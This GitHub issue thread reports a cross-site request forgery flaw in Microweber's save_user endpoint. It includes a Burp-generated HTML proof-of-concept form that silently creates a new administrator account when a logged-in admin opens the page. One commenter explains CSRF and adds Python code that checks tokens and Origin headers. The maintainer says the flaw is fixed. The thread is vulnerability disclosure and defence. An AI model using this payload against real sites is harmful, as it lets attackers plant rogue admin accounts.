
There is a CSRF vulnerability that can add the administrator account #483

Closed
AutismJH opened this issue Aug 31, 2018 · 3 comments

Comments

@AutismJH

After the administrator has logged in, opening the following page adds an administrator.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo1.microweber.com/api/save_user" method="POST">
      <input type="hidden" name="id" value="0" />
      <input type="hidden" name="thumbnail" value="" />
      <input type="hidden" name="username" value="3333" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="email" value="3333&#64;qq&#46;com" />
      <input type="hidden" name="first&#95;name" value="222" />
      <input type="hidden" name="last&#95;name" value="222" />
      <input type="hidden" name="is&#95;active" value="1" />
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="basic&#95;mode" value="1" />
      <input type="hidden" name="api&#95;key" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@peter-mw
Member

Hi, you can add an admin user only if you are logged in as an admin user.

If you try to add an admin user and you are not logged in as admin, this will not work.

@attritionorg

A CSRF attack leverages the admin being logged in, and exploits it by tricking them into clicking a link to perform a given action. In this case, if the admin clicks that link, they are logged in and that form they are clicking will add a new admin user which the attacker prompted. More info: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
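To illustrate the point above, here is an added example (not Microweber's own code) of a server-side check for a save_user handler that rejects the forged submission even though the admin's session cookie is attached. It assumes a synchronizer token kept in the session and echoed back in a `_token` form field, plus an Origin/Referer check against an assumed site origin; both sample requests are constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://demo1.microweber.com"  # assumed origin serving /api/save_user

@dataclass
class Session:
    is_admin: bool
    # Per-session secret: an attacker's page cannot read it, so it cannot be forged.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))

@dataclass
class Request:
    method: str
    headers: dict
    form: dict
    session: Session

def request_origin(req: Request):
    """Scheme+host the browser reports for the request: Origin, else Referer, else None."""
    if req.headers.get("Origin"):
        return req.headers["Origin"]
    ref = req.headers.get("Referer")
    if ref:
        p = urlsplit(ref)
        return f"{p.scheme}://{p.netloc}"
    return None  # neither header present: treated as cross-origin (fail closed)

def save_user_allowed(req: Request):
    """Return (allowed, reason). An admin session is necessary but not sufficient."""
    if req.method != "POST":
        return False, "method"
    if not req.session.is_admin:
        return False, "not-admin"
    if request_origin(req) != SITE_ORIGIN:
        return False, "cross-origin"
    sent = req.form.get("_token", "").encode()
    if not hmac.compare_digest(sent, req.session.csrf_token.encode()):
        return False, "bad-token"
    return True, "ok"

def forged_request(session: Session) -> Request:
    """Constructed sample: the PoC form auto-submitted from an attacker page while the admin is logged in."""
    form = {"id": "0", "username": "3333", "password": "123456", "is_admin": "1"}
    return Request("POST", {"Origin": "http://attacker.example"}, form, session)

def legit_request(session: Session) -> Request:
    """Constructed sample: the same fields submitted from the site's own admin UI, token included."""
    form = {"username": "3333", "password": "123456", "is_admin": "1", "_token": session.csrf_token}
    return Request("POST", {"Origin": SITE_ORIGIN}, form, session)
```

The `history.pushState` call in the PoC only rewrites the attacker page's address bar; the browser still sends the attacker's Origin (or no Origin at all), so the cookie alone never satisfies this check.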

@peter-mw
Member

Hi, the same issue is reported in #484 and it's already fixed.
